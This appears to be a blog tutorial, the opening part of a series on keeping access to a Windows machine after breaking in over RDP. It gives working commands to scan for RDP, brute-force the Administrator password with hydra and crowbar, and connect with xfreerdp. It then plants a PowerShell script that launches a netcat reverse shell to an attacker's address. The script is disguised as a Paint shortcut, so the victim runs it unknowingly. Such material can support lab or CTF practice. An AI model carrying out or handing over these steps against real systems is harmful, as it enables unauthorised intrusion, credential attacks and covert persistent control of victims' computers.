To be ensure not losing the gained access on target device, we should create alternative ways to get re-access without exploitation, yet re-exploitation may not be possible. One of the first steps is to establish persistence. It is the process of post-exploitation that mainly purposes a stable access. The most common way is to use the backdoors that can be always executed as long as the host is up. This is article series as to backdooring persistence on vulnerable RDP:
1. Shortcut .exe files from System32
2. Using executable files modified by msfvenom
3. Dumping hashes and assigning admin privileges for unprivileged users
4. Windows Login screen with Sticky Keys or Utilman
First task, discover whether the RPD port is open and vulnerable.
nmap -p 3389 -v --open 10.10.190.1/24
After discovering the open ports, RDP is one of them. Continue with brute force on login screen of Windows machine using hydra or crowbar tool for the user “Administrator”.
hydra -l Administrator -P pass_File 10.10.190.77 rdp
crowbar -b rdp -s 10.10.190.77/32 -u Administrator -C pass_File -n 1
1.Shortcut .exe files from System32
We can get remote connection with the gained credentials.
xfreerdp /u:"user" /v:host_IP:3389
Send a shortcut one of .exe files from System32 such as Calculator (calc), Paint (mspaint)….
Copy the following PowerShell script in a Notepad file and save it with .ps1 extension:
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe attacker_IP listening_Port”
Now, we can change the target of shortcut to call created script as follows;
powershell.exe -WindowStyle hidden path_of_ps1_file
Start listening port with nc on local to receive reverse shell
When the victim double-clicks the shortcut as if the user has opened Paint, attacker gets connection on terminal.
Comentários